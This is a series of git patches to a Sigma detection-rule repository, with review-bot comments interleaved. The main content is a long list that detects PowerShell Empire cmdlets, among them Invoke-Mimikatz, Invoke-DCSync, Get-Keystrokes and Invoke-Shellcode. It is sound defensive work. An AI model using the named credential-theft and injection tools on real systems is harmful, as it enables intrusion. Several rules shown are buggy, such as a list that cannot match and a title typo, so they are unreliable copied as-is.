'Get-NetGPOGroup' - - 'Find-GPOLocation' - - 'Find-GPOComputerAdmin' - - 'Get-DomainPolicy' - - 'Get-NetLocalGroup' - - 'Get-NetShare' - - 'Get-NetLoggedon' - - 'Get-NetSession' - - 'Get-NetRDPSession' - - 'Invoke-CheckLocalAdminAccess' - - 'Get-LastLoggedOn' - - 'Get-NetProcess' - - 'Find-InterestingFile' - - 'Invoke-CheckWrite' - - 'Invoke-UserHunter' - - 'Invoke-StealthUserHunter' - - 'Invoke-ProcessHunter' - - 'Invoke-EventHunter' - - 'Invoke-ShareFinder' - - 'Invoke-FileFinder' - - 'Find-LocalAdminAccess' - - 'Get-ExploitableSystem' - - 'Invoke-EnumerateLocalAdmin' - - 'Get-NetDomainTrust' - - 'Get-NetForestTrust' - - 'Find-ForeignUser' - - 'Find-ForeignGroup' - - 'Invoke-MapDomainTrust' - - 'Get-Hex' - - 'Create-RemoteThread' - - 'Get-FoxDump' - - 'Decrypt-CipherText' - - 'Get-Screenshot' - - 'Start-HTTP-Server' - - 'Local:Invoke-CreateRemoteThread' - - 'Local:Get-Win32Functions' - - 'Local:Inject-NetRipper' - - 'GetCommandLine' - - 'ElevatePrivs' - - 'Get-RegKeyClass' - - 
'Get-BootKey' - - 'Get-HBootKey' - - 'Get-UserName' - - 'Get-UserHashes' - - 'DecryptHashes' - - 'DecryptSingleHash' - - 'Get-UserKeys' - - 'DumpHashes' - - 'Enable-SeAssignPrimaryTokenPrivilege' - - 'Enable-Privilege' - - 'Set-DesktopACLs' - - 'Set-DesktopACLToAllowEveryone' - - 'Get-PrimaryToken' - - 'Get-ThreadToken' - - 'Get-TokenInformation' - - 'Get-UniqueTokens' - - 'Find-GPOLocation' - - 'Find-GPOComputerAdmin' - - 'Get-DomainPolicy' - - 'Get-NetLocalGroup' - - 'Get-NetShare' - - 'Get-NetLoggedon' - - 'Get-NetSession' - - 'Get-NetRDPSession' - - 'Invoke-CheckLocalAdminAccess' - - 'Get-LastLoggedOn' - - 'Get-NetProcess' - - 'Find-InterestingFile' - - 'Invoke-CheckWrite' - - 'Invoke-UserHunter' - - 'Invoke-StealthUserHunter' - - 'Invoke-ProcessHunter' - - 'Invoke-EventHunter' - - 'Invoke-ShareFinder' - - 'Invoke-FileFinder' - - 'Find-LocalAdminAccess' - - 'Get-ExploitableSystem' - - 'Invoke-EnumerateLocalAdmin' - - 'Get-NetDomainTrust' - - 'Get-NetForestTrust' - - 'Find-ForeignUser' - - 'Find-ForeignGroup' - - 'Invoke-MapDomainTrust' - - 'Get-Hex' - - 'Create-RemoteThread' - - 'Get-FoxDump' - - 'Decrypt-CipherText' - - 'Get-Screenshot' - - 'Start-HTTP-Server' - - 'Local:Invoke-CreateRemoteThread' - - 'Local:Get-Win32Functions' - - 'Local:Inject-NetRipper' - - 'GetCommandLine' - - 'ElevatePrivs' - - 'Get-RegKeyClass' - - 'Get-BootKey' - - 'Get-HBootKey' - - 'Get-UserName' - - 'Get-UserHashes' - - 'DecryptHashes' - - 'DecryptSingleHash' - - 'Get-UserKeys' - - 'DumpHashes' - - 'Enable-SeAssignPrimaryTokenPrivilege' - - 'Enable-Privilege' - - 'Set-DesktopACLs' - - 'Set-DesktopACLToAllowEveryone' - - 'Get-PrimaryToken' - - 'Get-ThreadToken' - - 'Get-TokenInformation' - - 'Get-UniqueTokens' - - 'Invoke-ImpersonateUser' - - 'Create-ProcessWithToken' - - 'Free-AllTokens' - - 'Enum-AllTokens' - - 'Invoke-RevertToSelf' - - 'Set-Speaker(\$Volume){\$wshShell' - - 'Local:Get-RandomString' - - 'Local:Invoke-PsExecCmd' - - 'Get-GPPPassword' - - 'Local:Inject-BypassStuff' - 
- 'Local:Invoke-CopyFile\(\$sSource,' - - 'ind-Fruit' - - 'New-IPv4Range' - - 'New-IPv4RangeFromCIDR' - - 'Parse-Hosts' - - 'Parse-ILHosts' - - 'Exclude-Hosts' - - 'Get-TopPort' - - 'Parse-Ports' - - 'Parse-IpPorts' - - 'Remove-Ports' - - 'Write-PortscanOut' - - 'Convert-SwitchtoBool' - - 'Get-ForeignUser' - - 'Get-ForeignGroup' + - 'SetDelay' + - 'GetDelay' + - 'Set-LostLimit' + - 'Get-LostLimit' + - 'Set-Killdate' + - 'Get-Killdate' + - 'Set-WorkingHours' + - 'Get-WorkingHours' + - 'Get-Sysinfo' + - 'Add-Servers' + - 'Invoke-ShellCommand' + - 'Start-AgentJob' + - 'Update-Profile' + - 'Get-FilePart' + - 'Encrypt-Bytes' + - 'Decrypt-Bytes' + - 'Encode-Packet' + - 'Decode-Packet' + - 'Send-Message' + - 'Process-Packet' + - 'Process-Tasking' + - 'Get-Task' + - 'Start-Negotiate' + - 'Invoke-DllInjection' + - 'Invoke-ReflectivePEInjection' + - 'Invoke-Shellcode' + - 'Invoke-ShellcodeMSIL' + - 'Get-ChromeDump' + - 'Get-ClipboardContents' + - 'Get-IndexedItem' + - 'Get-Keystrokes' + - 'Invoke-Inveigh' + - 'Invoke-NetRipper' + - 'local:Invoke-PatchDll' + - 'Invoke-NinjaCopy' + - 'Get-Win32Types' + - 'Get-Win32Constants' + - 'Get-Win32Functions' + - 'Sub-SignedIntAsUnsigned' + - 'Add-SignedIntAsUnsigned' + - 'Compare-Val1GreaterThanVal2AsUInt' + - 'Convert-UIntToInt' + - 'Test-MemoryRangeValid' + - 'Write-BytesToMemory' + - 'Get-DelegateType' + - 'Get-ProcAddress' + - 'Enable-SeDebugPrivilege' + - 'Invoke-CreateRemoteThread' + - 'Get-ImageNtHeaders' + - 'Get-PEBasicInfo' + - 'Get-PEDetailedInfo' + - 'Import-DllInRemoteProcess' + - 'Get-RemoteProcAddress' + - 'Copy-Sections' + - 'Update-MemoryAddresses' + - 'Import-DllImports' + - 'Get-VirtualProtectValue' + - 'Update-MemoryProtectionFlags' + - 'Update-ExeFunctions' + - 'Copy-ArrayOfMemAddresses' + - 'Get-MemoryProcAddress' + - 'Invoke-MemoryLoadLibrary' + - 'Invoke-MemoryFreeLibrary' + - 'Out-Minidump' + - 'Get-VaultCredential' + - 'Invoke-DCSync' + - 'Translate-Name' + - 'Get-NetDomain' + - 'Get-NetForest' + - 
'Get-NetForestDomain' + - 'Get-DomainSearcher' + - 'Get-NetComputer' + - 'Get-NetGroupMember' + - 'Get-NetUser' + - 'Invoke-Mimikatz' + - 'Invoke-PowerDump' + - 'Invoke-TokenManipulation' + - 'Exploit-JMXConsole' + - 'Exploit-JBoss' + - 'Invoke-Thunderstruck' + - 'Invoke-VoiceTroll' + - 'Set-WallPaper' + - 'Invoke-PsExec' + - 'Invoke-SSHCommand' + - 'Invoke-PSInject' + - 'Invoke-RunAs' + - 'Invoke-SendMail' + - 'Invoke-Rule' + - 'Get-OSVersion' + - 'Select-EmailItem' + - 'View-Email' + - 'Get-OutlookFolder' + - 'Get-EmailItems' + - 'Invoke-MailSearch' + - 'Get-SubFolders' + - 'Get-GlobalAddressList' + - 'Invoke-SearchGAL' + - 'Get-SMTPAddress' + - 'Disable-SecuritySettings' + - 'Reset-SecuritySettings' + - 'Get-OutlookInstance' + - 'New-HoneyHash' + - 'Set-MacAttribute' + - 'Invoke-PatchDll' + - 'Get-SecurityPackages' + - 'Install-SSP' + - 'Invoke-BackdoorLNK' + - 'New-ElevatedPersistenceOption' + - 'New-UserPersistenceOption' + - 'Add-Persistence' + - 'Invoke-CallbackIEX' + - 'Add-PSFirewallRules' + - 'Invoke-EventLoop' + - 'Invoke-PortBind' + - 'Invoke-DNSLoop' + - 'Invoke-PacketKnock' + - 'Invoke-CallbackLoop' + - 'Invoke-BypassUAC' + - 'Get-DecryptedCpassword' + - 'Get-GPPInnerFields' + - 'Invoke-WScriptBypassUAC' + - 'Get-ModifiableFile' + - 'Get-ServiceUnquoted' + - 'Get-ServiceFilePermission' + - 'Get-ServicePermission' + - 'Invoke-ServiceUserAdd' + - 'Invoke-ServiceCMD' + - 'Write-UserAddServiceBinary' + - 'Write-CMDServiceBinary' + - 'Write-ServiceEXE' + - 'Write-ServiceEXECMD' + - 'Restore-ServiceEXE' + - 'Invoke-ServiceStart' + - 'Invoke-ServiceStop' + - 'Invoke-ServiceEnable' + - 'Invoke-ServiceDisable' + - 'Get-ServiceDetail' + - 'Find-DLLHijack' + - 'Find-PathHijack' + - 'Write-HijackDll' + - 'Get-RegAlwaysInstallElevated' + - 'Get-RegAutoLogon' + - 'Get-VulnAutoRun' + - 'Get-VulnSchTask' + - 'Get-UnattendedInstallFile' + - 'Get-Webconfig' + - 'Get-ApplicationHost' + - 'Write-UserAddMSI' + - 'Invoke-AllChecks' + - 'Invoke-ThreadedFunction' + - 
'Test-Login' + - 'Get-UserAgent' + - 'Test-Password' + - 'Get-ComputerDetails' + - 'Find-4648Logons' + - 'Find-4624Logons' + - 'Find-AppLockerLogs' + - 'Find-PSScriptsInPSAppLog' + - 'Find-RDPClientConnections' + - 'Get-SystemDNSServer' + - 'Invoke-Paranoia' + - 'Invoke-WinEnum{' + - 'Get-SPN' + - 'Invoke-ARPScan' + - 'Invoke-Portscan' + - 'Invoke-ReverseDNSLookup' + - 'Invoke-SMBScanner' + - 'New-InMemoryModule' + - 'Add-Win32Type' + - 'Export-PowerViewCSV' + - 'Get-MacAttribute' + - 'Copy-ClonedFile' + - 'Get-IPAddress' + - 'Convert-NameToSid' + - 'Convert-SidToName' + - 'Convert-NT4toCanonical' + - 'Get-Proxy' + - 'Get-PathAcl' + - 'Get-NameField' + - 'Convert-LDAPProperty' + - 'Get-NetDomainController' + - 'Add-NetUser' + - 'Add-NetGroupUser' + - 'Get-UserProperty' + - 'Find-UserField' + - 'Get-UserEvent' + - 'Get-ObjectAcl' + - 'Add-ObjectAcl' + - 'Invoke-ACLScanner' + - 'Get-GUIDMap' + - 'Get-ADObject' + - 'Set-ADObject' + - 'Get-ComputerProperty' + - 'Find-ComputerField' + - 'Get-NetOU' + - 'Get-NetSite' + - 'Get-NetSubnet' + - 'Get-DomainSID' + - 'Get-NetGroup' + - 'Get-NetFileServer' + - 'SplitPath' + - 'Get-DFSshare' + - 'Get-DFSshareV1' + - 'Get-DFSshareV2' + - 'Get-GptTmpl' + - 'Get-GroupsXML' + - 'Get-NetGPO' + - 'Get-NetGPOGroup' + - 'Find-GPOLocation' + - 'Get-DomainPolicy' + - 'Get-NetLocalGroup' + - 'Get-NetShare' + - 'Get-NetLoggedon' + - 'Get-NetSession' + - 'Get-NetRDPSession' + - 'Invoke-CheckLocalAdminAccess' + - 'Get-LastLoggedOn' + - 'Get-NetProcess' + - 'Find-InterestingFile' + - 'Invoke-CheckWrite' + - 'Invoke-UserHunter' + - 'Invoke-StealthUserHunter' + - 'Invoke-ProcessHunter' + - 'Invoke-EventHunter' + - 'Invoke-ShareFinder' + - 'Invoke-FileFinder' + - 'Find-LocalAdminAccess' + - 'Get-ExploitableSystem' + - 'Invoke-EnumerateLocalAdmin' + - 'Get-NetDomainTrust' + - 'Get-NetForestTrust' + - 'Find-ForeignUser' + - 'Find-ForeignGroup' + - 'Invoke-MapDomainTrust' + - 'Get-Hex' + - 'Create-RemoteThread' + - 'Get-FoxDump' + - 
'Decrypt-CipherText' + - 'Get-Screenshot' + - 'Start-HTTP-Server' + - 'Local:Invoke-CreateRemoteThread' + - 'Local:Get-Win32Functions' + - 'Local:Inject-NetRipper' + - 'GetCommandLine' + - 'ElevatePrivs' + - 'Get-RegKeyClass' + - 'Get-BootKey' + - 'Get-HBootKey' + - 'Get-UserName' + - 'Get-UserHashes' + - 'DecryptHashes' + - 'DecryptSingleHash' + - 'Get-UserKeys' + - 'DumpHashes' + - 'Enable-SeAssignPrimaryTokenPrivilege' + - 'Enable-Privilege' + - 'Set-DesktopACLs' + - 'Set-DesktopACLToAllowEveryone' + - 'Get-PrimaryToken' + - 'Get-ThreadToken' + - 'Get-TokenInformation' + - 'Get-UniqueTokens' + - 'Find-GPOComputerAdmin' + - 'Invoke-ImpersonateUser' + - 'Create-ProcessWithToken' + - 'Free-AllTokens' + - 'Enum-AllTokens' + - 'Invoke-RevertToSelf' + - 'Set-Speaker(\$Volume){\$wshShell' + - 'Local:Get-RandomString' + - 'Local:Invoke-PsExecCmd' + - 'Get-GPPPassword' + - 'Local:Inject-BypassStuff' + - 'Local:Invoke-CopyFile\(\$sSource,' + - 'ind-Fruit' + - 'New-IPv4Range' + - 'New-IPv4RangeFromCIDR' + - 'Parse-Hosts' + - 'Parse-ILHosts' + - 'Exclude-Hosts' + - 'Get-TopPort' + - 'Parse-Ports' + - 'Parse-IpPorts' + - 'Remove-Ports' + - 'Write-PortscanOut' + - 'Convert-SwitchtoBool' + - 'Get-ForeignUser' + - 'Get-ForeignGroup' condition: selection1 or selection2 \ No newline at end of file diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml index e3fe87b9..daf67003 100644 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ b/rules/windows/builtin/win_user_acc_added_removed.yml 
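Review bot: The re-indented list is still a plain `CommandLine:` equality match, so each value is compared against the whole command line and none of them can ever match a real invocation; `CommandLine|contains:` is what the title describes and is the only one-line fix that makes selection2 live. Several values also carry regex escapes that Sigma does not interpret — `Set-Speaker(\$Volume){\$wshShell` and `Local:Invoke-CopyFile\(\$sSource,` will only match a literal backslash-dollar and backslash-paren — and `ind-Fruit` is a truncated `Find-Fruit`, `Invoke-WinEnum{` a fragment with a stray brace. With `condition: selection1 or selection2`, any ` -encodedCommand` fires as Empire regardless of this list. Once the operator is fixed, expect tuning: `Get-ADObject` and `Set-ADObject` are also cmdlets of Microsoft's ActiveDirectory module, and the hunk's line numbers leave no room for a `falsepositives` or `status` field in this file.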
@@ -1,7 +1,9 @@
 title: Account added and removed from privileged groups
 id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60
-description: 'Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.'
-references: Azure Sentinel
+description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.
+references:
+  - Azure Sentinel
+date: 2021/08/15
 level: low
 logsource:
   service: Security
diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml
index a6cd343c..7751dd33 100644
--- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml
+++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml
@@ -1,8 +1,9 @@
 title: User account enabled and disabled
 id: 3d023f64-8225-41a2-9570-2bd7c2c4535e
-description: 'Identifies when a user account is enabled and then disabled. This can be an indication of compromise and
-  an adversary attempting to hide in the noise.'
-references: Azure Sentinel
+description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise.
+references:
+  - Azure Sentinel
+date: 2021/08/15
 level: medium
 logsource:
   service: Security
diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
index 639debc5..264ac030 100644
--- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
+++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
@@ -1,8 +1,9 @@
 title: New user created and added to the built-in administrators group
 id: aa1eff90-29d4-49dc-a3ea-b65199f516db
-description: 'Identifies when a user account was created and then added to the builtin Administrators group.
-  This should be monitored closely and all additions reviewed.'
-references: Azure Sentinel
+description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed.
+references:
+  - Azure Sentinel
+date: 2021/08/15
 level: low
 logsource:
   service: Security

From c3457c9911691314ca348dfc264fe7682418abd0 Mon Sep 17 00:00:00 2001
From: frack113
Date: Sun, 15 Aug 2021 19:05:00 +0200
Subject: [PATCH 0355/1367] fix titles

---
 .../azure/azure_creating_number_of_resources_detection.yml | 2 +-
 rules/cloud/azure/azure_granting_permission_detection.yml | 2 +-
 rules/network/zeek/zeek_dns_mining_pools.yml | 2 +-
 rules/network/zeek/zeek_dns_torproxy.yml | 2 +-
 rules/web/sql_injection_keywords.yml | 2 +-
 rules/web/xss_keywords.yml | 2 +-
 rules/windows/builtin/win_event_log_cleared.yml | 2 +-
 rules/windows/builtin/win_powershelll_empire.yml | 2 +-
 rules/windows/builtin/win_user_acc_added_removed.yml | 2 +-
 rules/windows/builtin/win_user_acc_enabled_disabled.yml | 2 +-
 .../windows/builtin/win_user_created_added_to_bultin_admins.yml | 2 +-
 11 files changed, 11 insertions(+), 11 deletions(-)

diff --git a/rules/cloud/azure/azure_creating_number_of_resources_detection.yml b/rules/cloud/azure/azure_creating_number_of_resources_detection.yml
index d1a60829..74041d51 100644
--- a/rules/cloud/azure/azure_creating_number_of_resources_detection.yml
+++ b/rules/cloud/azure/azure_creating_number_of_resources_detection.yml
@@ -1,4 +1,4 @@
-title: number of resource creation or deployment activities
+title: Number Of Resource Creation Or Deployment Activities
 id: d2d901db-7a75-45a1-bc39-0cbf00812192
 status: experimental
 author: sawwinnnaung
diff --git a/rules/cloud/azure/azure_granting_permission_detection.yml b/rules/cloud/azure/azure_granting_permission_detection.yml
index cf644a6b..1a93acee 100644
--- a/rules/cloud/azure/azure_granting_permission_detection.yml
+++ b/rules/cloud/azure/azure_granting_permission_detection.yml
@@ -1,4 +1,4 @@
-title: Granting of permissions to an account
+title: Granting Of Permissions To An Account
 id: a622fcd2-4b5a-436a-b8a2-a4171161833c
 status: experimental
 author: sawwinnnaung
diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml
index 0de24200..c6b4cde5 100644
--- a/rules/network/zeek/zeek_dns_mining_pools.yml
+++ b/rules/network/zeek/zeek_dns_mining_pools.yml
@@ -1,5 +1,5 @@
+title: DNS Events Related To Mining Pools
 id: bf74135c-18e8-4a72-a926-0e4f47888c19
-title: DNS events related to mining pools
 description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools.
 references:
   - Azure Sentinel
diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml
index 466ab203..b3f89c18 100644
--- a/rules/network/zeek/zeek_dns_torproxy.yml
+++ b/rules/network/zeek/zeek_dns_torproxy.yml
@@ -1,5 +1,5 @@
+title: DNS TOR Proxies
 id: a8322756-015c-42e7-afb1-436e85ed3ff5
-title: DNS tor proxies
 description: Identifies IPs performing DNS lookups associated with common Tor proxies.
 references:
   - Azure Sentinel
diff --git a/rules/web/sql_injection_keywords.yml b/rules/web/sql_injection_keywords.yml
index f1dd7972..f3d8985f 100644
--- a/rules/web/sql_injection_keywords.yml
+++ b/rules/web/sql_injection_keywords.yml
@@ -1,4 +1,4 @@
-title: Detect sql injection by keywords
+title: Detect Sql Injection By Keywords
 id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453
 status: experimental
 description: Detects sql injection that use GET requests by keyword searches in URL strings
diff --git a/rules/web/xss_keywords.yml b/rules/web/xss_keywords.yml
index 775ec871..c5d1470f 100644
--- a/rules/web/xss_keywords.yml
+++ b/rules/web/xss_keywords.yml
@@ -1,4 +1,4 @@
-title: Detect XSS Attempts by keywords
+title: Detect XSS Attempts By Keywords
 id: 65354b83-a2ea-4ea6-8414-3ab38be0d409
 status: experimental
 description: Detects XSS that use GET requests by keyword searches in URL strings
diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml
index 0fdbdd54..f8c56070 100644
--- a/rules/windows/builtin/win_event_log_cleared.yml
+++ b/rules/windows/builtin/win_event_log_cleared.yml
@@ -1,5 +1,5 @@
+title: Security Event Log Cleared
 id: a122ac13-daf8-4175-83a2-72c387be339d
-title: Security Event log cleared
 status: experimental
 description: Checks for event id 1102 which indicates the security event log was cleared.
 references:
diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml
index 8aa638ef..6dc937fe 100644
--- a/rules/windows/builtin/win_powershelll_empire.yml
+++ b/rules/windows/builtin/win_powershelll_empire.yml
@@ -1,4 +1,4 @@
-title: Powershell Empire cmdlets seen in command line
+title: Powershell Empire Cmdlets Seen In Command Line
 id: ef88eb96-861c-43a0-ab16-f3835a97c928
 description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data.
 references:
diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml
index daf67003..f8ee4d37 100644
--- a/rules/windows/builtin/win_user_acc_added_removed.yml
+++ b/rules/windows/builtin/win_user_acc_added_removed.yml
@@ -1,4 +1,4 @@
-title: Account added and removed from privileged groups
+title: Account Added And Removed From Privileged Groups
 id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60
 description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.
 references:
diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml
index 7751dd33..72857cbc 100644
--- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml
+++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml
@@ -1,4 +1,4 @@
-title: User account enabled and disabled
+title: User Account Enabled And Disabled
 id: 3d023f64-8225-41a2-9570-2bd7c2c4535e
 description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise.
 references:
diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
index 264ac030..3eb3c977 100644
--- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
+++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
@@ -1,4 +1,4 @@
-title: New user created and added to the built-in administrators group
+title: New Uer Created And Added To The Built-in Administrators Group
 id: aa1eff90-29d4-49dc-a3ea-b65199f516db
 description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed.
 references:

From 0de1949c59750c626cf1f3e6950c13479ac99b2e Mon Sep 17 00:00:00 2001
From: frack113
Date: Sun, 15 Aug 2021 19:11:43 +0200
Subject: [PATCH 0356/1367] fix azure_rare_operations.yml

---
 rules/cloud/azure/azure_rare_operations.yml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
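Review bot: The new title for win_user_created_added_to_bultin_admins.yml introduces a typo — `title: New Uer Created And Added To The Built-in Administrators Group` should read `title: New User Created And Added To The Built-in Administrators Group`. The title is the alert name analysts see and is copied into every converted rule, so it is worth fixing before the rename propagates.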
diff --git a/rules/cloud/azure/azure_rare_operations.yml b/rules/cloud/azure/azure_rare_operations.yml
index caa65c03..1796dd12 100644
--- a/rules/cloud/azure/azure_rare_operations.yml
+++ b/rules/cloud/azure/azure_rare_operations.yml
@@ -1,4 +1,4 @@
-title: Rare subscription-level operations in Azure
+title: Rare Subscription-level Operations In Azure
 id: c1182e02-49a3-481c-b3de-0fadc4091488
 status: experimental
 author: sawwinnnaung
@@ -9,14 +9,14 @@ references:
 logsource:
   service: AzureActivity
 detection:
-  keywords: -Microsoft.DocumentDB/databaseAccounts/listKeys/action
+  keywords:
+  -Microsoft.DocumentDB/databaseAccounts/listKeys/action
   -Microsoft.Maps/accounts/listKeys/action
   -Microsoft.Media/mediaservices/listKeys/action
   -Microsoft.CognitiveServices/accounts/listKeys/action
   -Microsoft.Storage/storageAccounts/listKeys/action
   -Microsoft.Compute/snapshots/write
   -Microsoft.Network/networkSecurityGroups/write
-
   condition: keywords
 level: medium
 falsepositives:

From 050fb2b77df50a1bd8294890b253fe0897d5148a Mon Sep 17 00:00:00 2001
From: frack113
Date: Sun, 15 Aug 2021 19:17:56 +0200
Subject: [PATCH 0357/1367] fix more errors

---
 .../azure/azure_granting_permission_detection.yml | 1 -
 rules/cloud/azure/azure_rare_operations.yml | 14 +++++++-------
 2 files changed, 7 insertions(+), 8 deletions(-)

diff --git a/rules/cloud/azure/azure_granting_permission_detection.yml b/rules/cloud/azure/azure_granting_permission_detection.yml
index 1a93acee..2cfb1fe8 100644
--- a/rules/cloud/azure/azure_granting_permission_detection.yml
+++ b/rules/cloud/azure/azure_granting_permission_detection.yml
@@ -11,7 +11,6 @@ logsource:
 detection:
   keywords:
     - Microsoft.Authorization/roleAssignments/write
-
   condition: keywords
 level: medium
 falsepositives:
diff --git a/rules/cloud/azure/azure_rare_operations.yml b/rules/cloud/azure/azure_rare_operations.yml
index 1796dd12..49ae1bb7 100644
--- a/rules/cloud/azure/azure_rare_operations.yml
+++ b/rules/cloud/azure/azure_rare_operations.yml
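Review bot: The seven `-Microsoft.…` lines now placed under `keywords:` have no space after the dash, so YAML does not read them as sequence items; they fold into a single plain scalar, and the rule searches for one string containing all seven operation names, which no Activity log record contains. Each entry needs the dash-space form, `- Microsoft.DocumentDB/databaseAccounts/listKeys/action`, which the following commit on this page applies. Until then the rule converts without error but can never fire, which is worse than a parse failure because nothing flags it.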
@@ -10,13 +10,13 @@ logsource: service: AzureActivity detection: keywords: - -Microsoft.DocumentDB/databaseAccounts/listKeys/action - -Microsoft.Maps/accounts/listKeys/action - -Microsoft.Media/mediaservices/listKeys/action - -Microsoft.CognitiveServices/accounts/listKeys/action - -Microsoft.Storage/storageAccounts/listKeys/action - -Microsoft.Compute/snapshots/write - -Microsoft.Network/networkSecurityGroups/write + - Microsoft.DocumentDB/databaseAccounts/listKeys/action + - Microsoft.Maps/accounts/listKeys/action + - Microsoft.Media/mediaservices/listKeys/action + - Microsoft.CognitiveServices/accounts/listKeys/action + - Microsoft.Storage/storageAccounts/listKeys/action + - Microsoft.Compute/snapshots/write + - Microsoft.Network/networkSecurityGroups/write condition: keywords level: medium falsepositives: From a0df8ce84c381080f6c98aab370bc90211d65621 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:26:48 -0500 Subject: [PATCH 0358/1367] Create aws_efs_fileshare_mount_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -0,0 +1 @@ + From bde91611a9556e249b250d13bf2c192acfa9c501 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:27:22 -0500 Subject: [PATCH 0359/1367] Create aws_efs_fileshare_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml 
diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml @@ -0,0 +1 @@ + From ba8e9c9fcbaa0406f78e34148339a6fdaed1f33f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:28:10 -0500 Subject: [PATCH 0360/1367] Create gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -0,0 +1 @@ + From 7605795a9fc6e4bb750ef5a26d6c284cf925b479 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:30:23 -0500 Subject: [PATCH 0361/1367] Create gcp_dns_zone_modified_or_deleted.yml --- rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -0,0 +1 @@ + From b0f6f1130927da3a6f422cfb8795cc8fc53a5f3e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 14:31:04 -0500 Subject: [PATCH 0362/1367] Create aws_s3_control_modified_or_deleted.yml --- rules/cloud/aws/aws_s3_control_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/aws/aws_s3_control_modified_or_deleted.yml 
